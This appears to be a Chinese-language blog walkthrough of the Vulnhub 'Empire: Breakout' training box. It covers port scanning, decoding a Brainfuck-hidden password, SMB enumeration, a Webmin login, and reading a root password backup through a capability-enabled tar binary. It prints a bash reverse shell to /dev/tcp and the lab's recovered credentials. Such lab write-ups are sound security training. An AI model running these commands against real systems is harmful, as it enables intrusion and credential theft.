Vulnhub-Breakout
- Name: Empire: Breakout
- Date release: 21 Oct 2021
- Author: icex64 & Empire Cybersecurity
- Series: Empire
Difficulty: Easy
This box was created to be an Easy box, but it can be Medium if you get lost.
For hints discord Server ( https://discord.gg/7asvAhCEhe )
信息收集
靶机开机显示ip

nmap

1 | kali 192.168.169.220 |
靶机ip扫描

端口访问 80、139、445、10000、20000端口
139、445 无法访问
80

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15# 查看源代码
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->
Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。
这就是一个语言,但它不像C++那么多元化,但难度也一定的增加,因为
它只有8种关键字!1
2
3# brainfuck解码
.2uqPEfj3D<P'a-310000

- 20000

enum4linux
- enum4linux是Kali Linux自带的一款信息收集工具。它可以收集Windows系统的大量信息,如用户名列表、主机列表、共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等。该工具主要是针对Windows NT/2000/XP/2003,在Windows 7/10系统,部分功能受限。总的来说,一个工具可以获取这么多的信息,也算非常强大了。
1 | -U |
1 | enum4linux -a 192.168.169.230 |

登录
1 | https://192.168.169.230:20000/ |
1 | u: cyber |

shell

- 可以直接写shell

1 | 3mp!r3{You_Manage_To_Break_To_My_Secure_Access} |
1 | [cyber@breakout ~]$ ls -hl tar |

1 | cyber@breakout ~]$ ./tar -cvf ailx10.tar /var/backups/.old_pass.bak |

- 开启监听。开始执行shell。
1 | bash -i >& /dev/tcp/192.168.169.220/6666 0>&1 |

- 切换用户
1 | Ts&4&YurgtRX(=~h |

- 结束
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Putdownd’s Blog!

